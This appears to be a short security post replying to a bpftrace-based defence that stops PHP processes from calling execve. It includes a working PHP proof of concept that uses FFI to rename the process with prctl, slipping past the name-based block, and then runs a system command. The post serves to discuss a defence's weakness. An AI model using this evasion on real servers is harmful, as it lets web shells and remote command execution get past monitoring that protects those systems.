@cr0nym posted about using bpftrace to generically stop php and other /specific/ procs from calling execve, preventing most generic web shells + command execution exploits:
Generic bpftrace-based RCE/webshell prevention technique for critical Linux network services
some distros such as latest debian ship PHP with FFI enabled by default which means one can just call prctl to change the name of the forked process to bypass the blacklist. There are other methods incase prctl is added to the script left as an exercise to astute readers.
<?php
$ffi = FFI::cdef("
int system(const char *command);
int prctl(int option, const char *arg2, unsigned long arg3,
unsigned long arg4, unsigned long arg5);
");
$name = "ABAB";
$ffi->prctl(15, $name, 0, 0, 0);
$ffi->system('id');
?>